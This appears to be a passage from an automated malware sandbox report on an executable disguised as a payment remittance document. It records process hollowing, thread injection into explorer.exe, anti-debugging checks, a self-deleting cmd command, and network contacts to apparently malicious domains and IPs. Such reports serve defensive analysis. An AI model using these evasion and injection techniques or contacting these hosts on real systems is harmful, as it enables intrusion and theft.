          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04761B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04761B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.yummyblockparty.com
          Source: C:\Windows\explorer.exeDomain query: www.fitotec.net
          Source: C:\Windows\explorer.exeDomain query: www.johnharrisagent.com
          Source: C:\Windows\explorer.exeDomain query: www.btt5204.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exeDomain query: www.hide.osaka
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.15.104.66 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exeDomain query: www.itsready.support
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: C30000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3388
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeProcess created: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe'
          Source: explorer.exe, 00000006.00000000.260179688.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.250393211.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.229448758.0000000001980000.00000002.00020000.sdmp, raserver.exe, 00000013.00000002.476913226.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
